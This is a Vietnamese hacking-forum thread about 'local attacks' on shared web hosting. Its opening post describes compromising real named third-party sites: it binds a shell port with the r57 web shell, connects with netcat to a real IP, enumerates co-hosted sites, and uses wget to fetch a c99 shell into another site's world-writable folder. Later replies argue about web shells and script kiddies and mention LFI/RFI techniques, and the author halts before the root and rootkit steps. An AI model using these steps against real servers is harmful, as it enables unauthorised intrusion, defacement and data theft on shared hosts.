Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66416 /hvaonline/posts/list/11448.html#66416 GMT Re: Tản mạn Local Attack :D Phần 4 : drwxrwxrwx | rwxrwxrwx | 777 Các ký tự trên chắc ko còn ai xa lạ gì , Quỳnh Anh muốn nhắc lại 1 chút để dễ làm việc hơn với môi trường shell . Với Local Attack , các folder chmod 777 chính là một trong những yếu tố thuận lợi cho attackers . Ngẫm lại cũng buồn cười cho " đại ca " dinhcaohack của Vờ Nịt cứ đánh đố Quỳnh Anh là làm sao mà " đại ca " upload được shell trên viethacker.name :mrgreen: , ko lẽ bây giờ Quỳnh Anh ngồi liệt kê ra trăm ngàn cách để làm việc đó thì " đại ca " mới hiểu được là folder đó được chmod 777 hay sao haha , khổ thân cho " đại ca " tất cả các folder của vnmagic.net đều được chmod 701 nên " đại ca " phải remote qua viethacker.name mới có 1 folder chmod 777 :lol:) . Có lẽ ai cũng biết chuyện sử dụng r57 hay c99 để upload files vào 1 folder chmod 777 trên host victim đơn giản như thế nào rồi . Ở phần này Quỳnh Anh muốn nhắc đến 1 chức năng khác của r57 : Bind port to /bin/bash , và chúng ta sẽ làm việc trên Netcat . Hôm nay lang thang trên Google lụm được trang này về làm bài minh họa :
http://www.bullzer.com/ ( Xin cảm ơn ) 
Khi attackers đã upload r57 vào host của bullzer.com :
các bạn hãy nhìn vào mũi tên trên hình , trước tiên ta sẽ tìm xem IP của server này là gì :
Attackers có thể bind port bất kỳ qua r57 trên host victim :
và dễ dàng dùng Netcat connect vào cổng vừa mở ( như chúng ta đã biết IP của server trên là 209.67.219.235 và port Quỳnh Anh vừa bind là 1221) :
nc -vv 209.67.219.235 1221 

Với các lệnh id : kiểm tra group hiện tại , pwd kiểm tra directory hiện tại . Tới đây có lẽ các bạn mới bắt đầu tìm hiểu hacking sẽ thắc mắc như vậy chúng ta sẽ làm gì tiếp tục ? tại sao chúng ta ko khai thác trực tiếp trên php shell ? Rất đơn giản , để khai thác 1 server , attackers cần phải có 1 môi trường thuận lợi , theo dõi tiếp tục bài viết các bạn sẽ thấy rõ vấn đề hơn . Nhưng trước tiên đi sang các phần khác , Quỳnh Anh nhắc lại 1 chút về Local Attack từ site này sang site khác cùng 1 sever ( ở đây chúng ta sử dụng Netcat ) . Hãy kiểm tra các sites trên cùng server này :
ls -la /etc/valiases 
Kết quả sẽ như sau :
Chúng ta đã liệt kê được tất cả users và sites trên server này , Quỳnh Anh chọn site showpart.net làm mục tiêu . Xem lại các bước trên , các bạn sẽ dễ dàng nhận thấy các directory của các sites trên server này có dạng :
/home/user/public_html/ 
và site showpart.net có user là showpart , trở lại Netcat chúng ta dùng lệnh :
cd /home/showpart/public_html/ ls -lia 

Dễ dàng nhận thấy thư mục cache và templates_c của site này chmod 777 , dễ dàng cho chúng ta upload php shell vào với các câu lệnh đơn giản sau :
- cd templates_c ( chuyển sang work directory /home/showpart/public_html/templates_c ) - wget [color="#2E8B57"]http://viethacker.name/testsh/9s1.txt[/color] ( link file shell c99 dạng txt ) - mv 9s1.txt girlnoob.php ( đổi file 9s1.txt thành girlnoob.php để sử dụng )  

Và kết quả cuối cùng hãy kiểm tra xem nào :
Và bây giờ Quỳnh Anh chỉ việc mở url browser lên và connect vào http://showpart.net/templates_c/girlnoob.php nếu muốn tiếp tục công việc còn lại ... Phần 4 Quỳnh Anh tạm ngưng ở đây . Hi vọng các bạn sẽ có 1 cái nhìn thực tế hơn trong việc CHMOD 777 . Để bảo đảm an toàn cho các sites minh họa bài này Quỳnh Anh đã remove tất cả php shell , các bạn có thể ghé thăm người ta nhưng đừng cố tìm links shell làm gì nhé :wink: .]]>
/hvaonline/posts/list/11448.html#66418 /hvaonline/posts/list/11448.html#66418 GMT
Tản mạn Local Attack :D GirL Noob rút kinh nghiệm cho các bài viết sau. Thân.]]> /hvaonline/posts/list/11448.html#66424 /hvaonline/posts/list/11448.html#66424 GMT Tản mạn Local Attack :D

prof wrote:
Hello GirL Noob, Trước tiên, rất cảm ơn bạn đã có loạt bài viết tỉ mỉ cho HVA. Tuy nhiên, nếu lược bỏ đi một số câu từ đả kích một vài cá nhân, hay nhóm người nào đó ít nhiều có liên quan đến bạn, thì bài viết của bạn sẽ hay hơn. Khi đó, các thảo luận sẽ tập trung vào chuyên môn, thay cho việc xuất hiện lời qua tiếng lại trên diễn đàn mà tôi nghĩ bản thân bạn cũng không muốn thế, đúng ko nhỉ? :)) Mong bạn GirL Noob rút kinh nghiệm cho các bài viết sau. Thân. 
Em xin lỗi , thật ra thì cũng vì người ta muốn nghe em nói thôi :(( . Em cũng hứa là ko nói thêm gì nữa rồi . Các bài viết sau em sẽ rút kinh nghiệm . Cảm ơn anh và mọi người quan tâm .]]>
/hvaonline/posts/list/11448.html#66429 /hvaonline/posts/list/11448.html#66429 GMT
Tản mạn Local Attack :D

GirL Noob wrote:
[color="#FF0000"]Phần 2 :[/color] Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :
 
Quỳnh Anh có phải là Meo con Hacker không nhei. Cô bé đừng như thế nữa nhé. Tại sao Des tại đánh vnmagic. Và tại sao HCV lại ra đi? Rồi còn chú server upload của CHF nữa. :) và cái vnhacker.biz j j của E. Bọn E tự up 2 chú shell R57 và R59 lên đấy. Để rồi gậy ông đập lưng ông. ---- Bài viết của kưng rất có giá trị cho Newbie. Nhưng mọi người đừng theo đấy nhé. Phài biết cách tấn công thì mới phòng chống đc Nhưng đừng chọc j của ai nhé]]>
/hvaonline/posts/list/11448.html#66454 /hvaonline/posts/list/11448.html#66454 GMT
Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66476 /hvaonline/posts/list/11448.html#66476 GMT Re: Tản mạn Local Attack :D

GirL Noob wrote:
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript> 
:-o)  
Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1) nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về. Muốn thâm nhập, tàn phá, bảo vệ, phòng thủ.... đều phải biết rõ mình đang dùng cái gì và đang làm gì với nó. Đây là lý do tại sao tôi phát biểu lần đầu: Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn. Những ai có đủ kiên nhẫn, đủ kiến thức để soi mấy con r57, c99 và những con tương tự để "bào chế" theo ý mình thì không xếp vào dạng "script kiddie". Tuy nhiên, nếu vì thế mà cho mình là 'hacker' thì chưa đủ bởi vì vẫn dùng cái người khác đã tạo ra cho mục đích riêng của mình. Ngoài ra những hành vi đưa cái dòng "developed by...." và là những hành vi không thể chấp nhận được.]]>
/hvaonline/posts/list/11448.html#66520 /hvaonline/posts/list/11448.html#66520 GMT
Re: Tản mạn Local Attack :D Code:
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Chời ạ, với id như thế mà làm mưa làm gió cả cái server được hả chài ? Khâm phục, khâm phục. :?) ]]>
/hvaonline/posts/list/11448.html#66527 /hvaonline/posts/list/11448.html#66527 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66541 /hvaonline/posts/list/11448.html#66541 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66550 /hvaonline/posts/list/11448.html#66550 GMT Re: Tản mạn Local Attack :D Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1)nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về.   Hix xưa nay em tải các thứ trên mạng về chả bao giờ em soi code rồi mới dùng (đúng hơn là kô biết soi). Mà phải tải về rồi tự soi rồi mới biết chính xác được chứ các bác. Thậm chí cùng là món đó nhưng lại được người khác sửa, thêm chức năng vào rồi up lên nói vẫn là nó thì làm sao mà biết được nếu kô down về tự mình soi. Mà mấy ai có đủ trình độ để soi chứ. Kết luận là nếu kô biết soi code thì đừng down thứ gì ("từ những nguồn kô đảm bảo" thì đủ hơn) trên mạng về. mà những người biết soi code có mấy ngừoi kô trải qua thời kỳ kô biết soi code :mrgreen: --> Chẳng mấy ai down cái gì ở những trang web đen nữa :mrgreen: --> những trang Web đen tồn tại làm gì :mrgreen: --->thế gới mới đẹp làm sao :mrgreen: ]]> /hvaonline/posts/list/11448.html#66564 /hvaonline/posts/list/11448.html#66564 GMT Re: Tản mạn Local Attack :D

Ghost Ship wrote:
Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1)nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về.  
Hix xưa nay em tải các thứ trên mạng về chả bao giờ em soi code rồi mới dùng (đúng hơn là kô biết soi). Mà phải tải về rồi tự soi rồi mới biết chính xác được chứ các bác. Thậm chí cùng là món đó nhưng lại được người khác sửa, thêm chức năng vào rồi up lên nói vẫn là nó thì làm sao mà biết được nếu kô down về tự mình soi. Mà mấy ai có đủ trình độ để soi chứ. Kết luận là nếu kô biết soi code thì đừng down thứ gì ("từ những nguồn kô đảm bảo" thì đủ hơn) trên mạng về. mà những người biết soi code có mấy ngừoi kô trải qua thời kỳ kô biết soi code :mrgreen: --> Chẳng mấy ai down cái gì ở những trang web đen nữa :mrgreen: --> những trang Web đen tồn tại làm gì :mrgreen: --->thế gới mới đẹp làm sao :mrgreen:  
Ừa... không biết soi code thì khoan hẵng mó vào những thứ "độc hại". Những người biết soi code ai cũng phải đi qua giai đoạn đọc code như đọc tiếng... Phạn. Tuy nhiên, cái khác ở chỗ là họ học để có thể đọc chúng nếu như muốn nghiên cứu về chúng, còn những người không có chút khả năng soi code mà vẫn cứ download về và dùng ầm ầm.... rồi cảm thấy... tự hào ;)). Tất cả những trang web cho download trojans, keyloggers, viruses... các scripts (php, perl....) là những nơi không bao giờ cho không một thứ gì hết. Nên nhớ điều này. Năm ngoái, 1 đám black hat bên Nga tuyên bố rằng, họ nắm trong tay hơn một triệu hosts trên Internet và đây là chuyện không ngoa tí nào. Có những người hiện đang nghĩ họ là 'héc cơ' nhưng thực chất, họ chính là những người làm không công nhưng rất đắc lực cho các đám black hat. Đây cũng là điều nên suy tư nhiều hơn.]]>
/hvaonline/posts/list/11448.html#66572 /hvaonline/posts/list/11448.html#66572 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66577 /hvaonline/posts/list/11448.html#66577 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66585 /hvaonline/posts/list/11448.html#66585 GMT Re: Tản mạn Local Attack :D

anhdaikho_vt wrote:
Code:
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Chời ạ, với id như thế mà làm mưa làm gió cả cái server được hả chài ? Khâm phục, khâm phục. :?)  
Tại sao lại ko nhỉ :mrgreen: .
Local Attack mức độ nguy hiểm như thế nào mọi người xem kết quả rồi rút ra kết luận riêng nhé :
( Cái này chụp lại trước khi logout ai xem cũng biết là đang làm gì rồi hén , tốt nhất là ko nên quên bước này nếu ko muốn ... :cry: ) Nhận được khuyến cáo từ các anh đi trước về hậu quả khó lường nếu GirL no0B cứ tiếp tục tường thuật chi tiết các bước Get root , rootkit và Mass deface như các phần ở trên . Mục đích của GirL no0B khi viết bài này chỉ mong muốn được học hỏi thêm của mọi người và giúp các bạn newbie như GirL no0B có cái nhìn thực tế hơn trong việc bảo mật trước vấn đề Local Attack . GirL no0B ko hi vọng mình trở thành kẻ ... vẽ đường cho hươu chạy :wink: . Các phần tiếp theo chúng ta sẽ thảo luận vào 1 lúc thích hợp hơn nhé :P) . ]]>
/hvaonline/posts/list/11448.html#66634 /hvaonline/posts/list/11448.html#66634 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66639 /hvaonline/posts/list/11448.html#66639 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66712 /hvaonline/posts/list/11448.html#66712 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66726 /hvaonline/posts/list/11448.html#66726 GMT Re: Tản mạn Local Attack :D

conmale wrote:
Muốn thâm nhập, tàn phá, bảo vệ, phòng thủ.... đều phải biết rõ mình đang dùng cái gì và đang làm gì với nó. Đây là lý do tại sao tôi phát biểu lần đầu: Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn. Những ai có đủ kiên nhẫn, đủ kiến thức để soi mấy con r57, c99 và những con tương tự để "bào chế" theo ý mình thì không xếp vào dạng "script kiddie". Tuy nhiên, nếu vì thế mà cho mình là 'hacker' thì chưa đủ bởi vì vẫn dùng cái người khác đã tạo ra cho mục đích riêng của mình. Ngoài ra những hành vi đưa cái dòng "developed by...." và là những hành vi không thể chấp nhận được.  
Xin được gửi lời cảm ơn chân thành đến anh conmale cho lời khuyên cực kỳ giá trị này .

anhdaikho_vt wrote:
Chắc serv này cấu hình "chuẩn" lắm nghen :!:) . Chời ơi á. Serv nào cũng như em serv này chắc chả ai dám thuê host nữa :cry: Pó giò. 
Cấu hình có chuẩn bao nhiêu cũng ko qua ... lỗi bảo mật bạn àh :D) . ]]>
/hvaonline/posts/list/11448.html#66791 /hvaonline/posts/list/11448.html#66791 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66835 /hvaonline/posts/list/11448.html#66835 GMT Re: Tản mạn Local Attack :D Các ký tự trên chắc ko còn ai xa lạ gì , Quỳnh Anh muốn nhắc lại 1 chút để dễ làm việc hơn với môi trường shell . Với Local Attack , các folder chmod 777 chính là một trong những yếu tố thuận lợi cho attackers . Ngẫm lại cũng buồn cười cho " đại ca " dinhcaohack của Vờ Nịt cứ đánh đố Quỳnh Anh là làm sao mà " đại ca " upload được shell trên viethacker.name , ko lẽ bây giờ Quỳnh Anh ngồi liệt kê ra trăm ngàn cách để làm việc đó thì " đại ca " mới hiểu được là folder đó được chmod 777 hay sao haha , khổ thân cho " đại ca " tất cả các folder của vnmagic.net đều được chmod 701 nên " đại ca " phải remote qua viethacker.name mới có 1 folder chmod 777  viethacker.name và vnmagic.net nằm chung một account và tay attacker đó có shell chung server sao không cat /path_to_vnmagic.net/conf_global.php để chọc database mà phải upload vào viethacker.name nhỉ. ???HIỂU ĐOẠN NÀY CHẾT LIỀN??? Nói chung người viết bài này chưa hiểu gì về local attack cả. Nhiều khi chẳng phải upload lên chung server mà có thể RFI (include shell từ host khác) hoặc LFI (include một file .jpg gif có nội dung của shell được upload lên qua chức năng upload avatar) hoặc đôi khi đọc được nội dung file bất kỳ thông qua thi hành một file stupid do lỗi code dạng như: http://site/stupid_code.php?act=path_to_file_attacker_want_to_read]]> /hvaonline/posts/list/11448.html#67245 /hvaonline/posts/list/11448.html#67245 GMT Re: Tản mạn Local Attack :D

hack2prison wrote:
viethacker.name và vnmagic.net nằm chung một account và tay attacker đó có shell chung server sao không cat /path_to_vnmagic.net/conf_global.php để chọc database mà phải upload vào viethacker.name nhỉ. ???HIỂU ĐOẠN NÀY CHẾT LIỀN??? Nói chung người viết bài này chưa hiểu gì về local attack cả. Nhiều khi chẳng phải upload lên chung server mà có thể RFI (include shell từ host khác) hoặc LFI (include một file .jpg gif có nội dung của shell được upload lên qua chức năng upload avatar) hoặc đôi khi đọc được nội dung file bất kỳ thông qua thi hành một file stupid do lỗi code dạng như: http://site/stupid_code.php?act=path_to_file_attacker_want_to_read 
GirL no0B được nghe đến hack2prison nhiều mà chưa có dịp diện kiến , ko ngờ lại được hack2prison quan tâm đến bài viết của mình thật là vinh hạnh ghê đó :mrgreen: . Có lẽ hack2prison đã ko xem kỹ các phần đầu của bài viết có đoạn :
Trở lại VN Magic sau khi bị drop , nhân vật dinhcaohack này muốn che dấu các bước đi của mình ( để khai thác lâu dài hay một mục đích gì khác mà Quỳnh Anh chưa biết ) nên đã upload c99 vào folder testsh của site www.viethacker.name , site này nằm chung account với VN Magic trên IX WEB HOSTING nên không khó để làm việc này vì folder nói trên được CHMOD 777 ( ở phần 3 của bài viết chúng ta sẽ đi chi tiết vào vấn đề này ) .  
thật ra mục đích của bài viết là chia sẽ với các bạn newbie các bước khai thác thông thường của Local Attack cho nên GirL no0B mới bắt đầu từ shell ở viethacker.name để tấn công vnmagic.net , chứ phần 1 bài viết đã giới thiệu rõ ràng cái trò bind code vào sources và skin để tạo thành lỗi Remote Files Inclusion , khai thác lỗi này thì quá phổ biến ai mà chưa từng biết :wink: . Và nói chung đúng như hack2prison nhận xét , GirL no0B hoàn toàn chưa hiểu gì về Local Attack cả , hi vọng được " đàn anh " đi trước chỉ bảo thêm . GirL no0B xin cảm ơn :D) .]]>
/hvaonline/posts/list/11448.html#67278 /hvaonline/posts/list/11448.html#67278 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67295 /hvaonline/posts/list/11448.html#67295 GMT Tản mạn Local Attack :D Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.   Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ? Còn nhiều cái mún viết lắm.... nhưng nghĩ... :P Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt ]]> /hvaonline/posts/list/11448.html#67421 /hvaonline/posts/list/11448.html#67421 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67422 /hvaonline/posts/list/11448.html#67422 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67424 /hvaonline/posts/list/11448.html#67424 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67425 /hvaonline/posts/list/11448.html#67425 GMT Tản mạn Local Attack :D

nhocbmt wrote:
Hùm... ! Càng đọc thấy càng có nhiều ý kiến cá nhân ghê :) Chắc mọi người ở đây cũng bít em là ai :D Vâng nói luôn , em là lthh ( HCE ) ! OKeys ? ! Em là Supper Noob ! Đọc bài của Girl Noob hok hiểu cứ .... , nhưng có vài ý kiến như sau dành cho GN và 1 số cá nhân tham gia topic này ;) Nếu em có sai thì xin chỉ để em sữa ! OKey all ? 1. GN àh ! những gì mà sis viết ... loạt bài này ... quả thật có giá trị , nhưng những lời nhận xét , những lời bình của sis thì quả là.... đáng để cho người ta cười vào mặt í ! Lần sau nên tránh tình trạng viết 1 đằng bắn luôn 1 nẻo nhé ! "LOCAL ATTACKS" theo mình được xem như là 1 " KĨ THUẬT " , nếu biết cách tận dụng và sử dụng kĩ thuật đó " CÓ MỤC ĐÍCH " ! OK ? Vâng ! Như nhiều tuts mà lt đã viết , HACK là phải có " MỤC ĐÍCH " ! OKey ? Vnmagic gần đây hình như cũng từng đã bị HCE Deface khi sài serv win thì phải ??? Tại nghe mem nói thoai àh ! Chứ cũng hok rõ :D Mới đầu đọc ... tưởng chừng như GN thật cao siêu và biết suy nghĩ.... nhưng.... :) Và theo lt nghĩ , thế giới "hack" khi attacker đã có mục tiêu ( tức nhiên là mục tiêu phải có lợi cho attacker rồi ) thì có thể sữ dụng " mọi thủ đoạn " để đạt được mục tiêu đó ! OKies ? Bao gồm cả : scam , lô chai đại bát hay gì gì đó ..... ! Và GN nè , sis có nói "........ Ít nhất cũng biết trình độ của vài cá nhân ....... " -> Xin hõi dựa vào đâu để u xuất phát ra được câu nói này ??? 2. To 1 số cá nhân : Trích anh conmale :
Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.  
Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ? Còn nhiều cái mún viết lắm.... nhưng nghĩ... :P Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt  
@ nhocbmt : GirL no0B chỉ là newbie mới biết Net được khoảng đôi ba tháng , cũng không có quan hệ nhiều nên ko được cơ hội diện kiến các "bậc đàn anh" đi trước , mọi phán đoán của GirL no0B về 1 điều gì đó hay 1 người nào đó đều chỉ là qua thực tế mà nhận thấy và đưa ra cảm nghĩ riêng của mình . Tuy nhiên GirL no0B cũng từng nghe kể về Lãng Tử Hào Hoa một chút kiến thức bẻ đôi về mạng cũng ko có mà lại nắm vị trí admin của HCE , nay được gặp quả nhiên thấy lời đồn ko ngoa , chính mình cũng ko hiểu mình đang phát biểu điều gì , lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn ) , âu rằng sự sụp đổ của HCE cũng là điều ko thể tránh . GirL no0B chỉ thành thật muốn nhắc lthh hay nhocbmt gì đó rằng trước tiên hãy xem kỹ từ đầu đến cuối nội dung bài thảo luận , hiểu được người ta đang nói điều gì thì hãy lên tiếng góp ý .Trả lời riêng cho bạn về câu hỏi được đậm màu đỏ ở trên là chính là nhờ những điều thực tế đang xảy ra ví dụ như là sau khi nhận được bài reply của bạn đây mà GirL no0B có thể khẳng định được . Tại sao ai cũng hiểu mà chỉ 1 người ko hiểu nhỉ :?:) . @ hackernohat : đúng như baothu nói vậy đó anh , safe mode off hay on bây giờ cũng không khác nhau mấy đâu . @ baothu : GirL no0B ko hề thêm vào dòng Developed by ... nào cả , đấy chính là tác phẩm của HCE Group , có lẽ bạn cũng nên xem lại từ đầu topic thì sẽ nắm bắt nhiều hơn :mrgreen: .]]>
/hvaonline/posts/list/11448.html#67430 /hvaonline/posts/list/11448.html#67430 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67434 /hvaonline/posts/list/11448.html#67434 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67435 /hvaonline/posts/list/11448.html#67435 GMT Tản mạn Local Attack :D Tuy nhiên GirL no0B cũng từng nghe kể về Lãng Tử Hào Hoa một chút kiến thức bẻ đôi về mạng cũng ko có mà lại nắm vị trí admin của HCE , nay được gặp quả nhiên thấy lời đồn ko ngoa , chính mình cũng ko hiểu mình đang phát biểu điều gì , lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn ) , âu rằng sự sụp đổ của HCE cũng là điều ko thể tránh .   YEah ! Như đã nói ở trên :) I'm supper noob ! OK ! but xem lại 1 xí :
lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn )  
ê !lụm đâu ra dậy ? còn ghi " nguyên văn " nữa mới đau chứ ? xem lại :
Vnmagic gần đây hình như cũng từng đã bị HCE Deface khi sài serv win thì phải??? Tại nghe mem nói thoai àh ! Chứ cũng hok rõ :D  
Đã và đang xem , phần tiếp tục của pro GIRL NOOB :) CỨ tiếp tục ..... ]]>
/hvaonline/posts/list/11448.html#67438 /hvaonline/posts/list/11448.html#67438 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67444 /hvaonline/posts/list/11448.html#67444 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67456 /hvaonline/posts/list/11448.html#67456 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67462 /hvaonline/posts/list/11448.html#67462 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#67464 /hvaonline/posts/list/11448.html#67464 GMT Tản mạn Local Attack :D

mrro wrote:
Thiệt tình nói bồ Girl Noob đừng buồn, tôi đọc từ đầu đến giờ cũng hơn 3 trang rồi mà vẫn chưa thấy chỗ nào là của bồ Girl Noob tự viết hết. Những chi tiết bồ Girl Noob đưa ra đều hoặc sử dụng công cụ nào đó của người khác, hoặc khai thác một lỗi phần mềm đã biết nào đó, tôi vẫn chưa thấy được một chút gì đó gọi là sáng tạo hay của riêng cá nhân bồ Girl Noob. Nếu phần kế tiếp bồ cũng chỉ tiếp tục quanh đi quẩn lại như thế thì dẫu bồ có get root được server, tôi cũng chẳng có hứng thú đọc tiếp. Nếu quả thật như thế, tôi chân thành khuyên bồ không nên viết tiếp nữa làm gì, mà nên dành thời gian để làm những việc khác có ích hơn, chẳng hạn như đọc sách. Vài góp ý, -m 
Cảm ơn ý kiến của anh , bài viết này ghi rõ dành cho đối tượng là newbie tham khảo cho vui chứ còn đối với những người đã biết thì thật đúng là chẳng có hứng thú gì để xem :lol:) . Vâng , em sẽ đi làm chuyện khác có ích hơn như lời khuyên của anh và đề tài này đặt dấu chấm hết tại đây là hoàn toàn hợp lý . ]]>
/hvaonline/posts/list/11448.html#67465 /hvaonline/posts/list/11448.html#67465 GMT
Tản mạn Local Attack :D

nhocbmt wrote:
2. To 1 số cá nhân : Trích anh conmale :
Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.  
Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ?  
Nếu em nắm trong tay từng function và mọi chi tiết ẩn / hiện của một cái script ai đó viết, thậm chí em còn có khả năng điều chỉnh, cải tiến để nó làm việc theo ý em thì em không việc gì phải tự ái và phải phát biểu như trên. Nếu em không làm được chuyện đó mà chỉ lôi nó về, tìm cách cài trên một vài server bị lỗ hổng ở đó và kết thúc bằng... "hacked by..." thì em nên tự ái. Tự ái không phải vì ai đó "ám chỉ" rằng em là "kiddie", chẳng biết cái gì cho ngọn ngành mà vẫn "hacked by..." đều đều mà em nên tự ái là tạo sao em không đủ khả năng đọc, khám phá, khai triển những thứ ai đã đã viết sẵn. "Mục tiêu" của một kẻ muốn chinh phục, muốn thử nghiệm một cách nghiêm túc khác hẳn với "mục tiêu" của một kiddie. Kiddie không cần biết, không cần quan tâm đến những dung hại (ngay cả dung hại xảy ra với chính mình) mà chỉ quan tâm đến 1 cái tool nào đó có thể làm được những điều "kỳ diệu". Bởi thế, không phải mục tiêu nào cũng như nhau và có giá trị như nhau. Đến chừng nào em vẫn chưa nhận ra được điều này, em vẫn nên tiếp tục tự ái vì "vẫn chưa lớn khôn".

nhocbmt wrote:
Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt  
Khi em tham gia một open source project, phần nào em viết, phần đó em kèm tên của em vào (trong code). Thường cái hiệu "developed by" dành cho tên nhóm chớ chẳng có ai chơi trò đưa tên cá nhân mình vào cái khoản "developed by" vì nó vừa phô, vừa buồn cười. Một nhóm vài người hoặc vài trăm người tham gia project mà ông nào cũng "developed by" thì cái phần copyright của nó ra cái hình thù gì? Muốn thêm bao nhiêu "Developed by" lại không đươc? nhưng người có tự trọng không làm những chuyện như thế. Bởi thế, rất nên nêu ra chuyện này để rút kinh nghiệm.]]>
/hvaonline/posts/list/11448.html#67490 /hvaonline/posts/list/11448.html#67490 GMT
